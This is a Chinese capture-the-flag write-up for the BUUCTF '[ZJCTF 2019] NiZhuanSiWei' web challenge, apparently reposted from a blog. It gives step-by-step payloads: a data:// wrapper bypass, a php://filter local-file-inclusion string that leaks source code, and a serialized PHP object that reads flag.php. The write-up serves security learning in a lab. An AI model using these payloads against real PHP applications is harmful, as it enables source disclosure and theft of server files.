BUUCTF-[ZJCTF 2019]NiZhuanSiWei
作者:互联网
BUUCTF-[ZJCTF 2019]NiZhuanSiWei
一、知识点
1、php各种协议,data://,php://
payload构造:
text=data://text/plain,welcome to the zjctf
data协议解释:https://www.php.net/manual/zh/wrappers.data.php
2、文件包含
payload构造:
file=php://filter/read=convert.base64-encode/resource=useless.php
3、反序列化
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
构造代码如下:
<?php
class Flag{
public $file=flag.php;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
$a=new Flag();
echo serialize($a);
echo urlencode(serialize($a));
?>
二、解题过程
1、代码审计
2、file_get_contents和data协议
(file_get_contents($text,'r') === "welcome to the zjctf"
使用php的data协议
payload如下:
data://text/plain;base64
text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
或者
text=data://text/plain,welcome to the zjctf
file_get_contents函数
会把文件中的内容读入一个字符串中
data协议解释
data协议可以使你输入得字符串作为数据流
3、include($file)文件包含
else{
include($file); //useless.php
$password = unserialize($password);
echo $password;
}
关键的payload:
file=php://filter/read=convert.base64-encode/resource=useless.php
那么第二步完整payload
text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
得到base64密文
PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=
4、useless.php得代码
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
我们发现useless.php是一个类,并且提示我们flag在flag.php
明确了文件位置就可以开始构造pop链。
第三步的关键payload3:
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
利用如下代码生成。
<?php
class Flag{ //flag.php
public $file = "flag.php";
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
$demo = new Flag();
$u = serialize($demo);
echo $u;
?>
5、完整payload
text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
直接查看网页源码,得到flag:
标签:BUUCTF,ZJCTF,text,echo,NiZhuanSiWei,flag,file,php,data 来源: https://blog.csdn.net/qq_51927659/article/details/116862651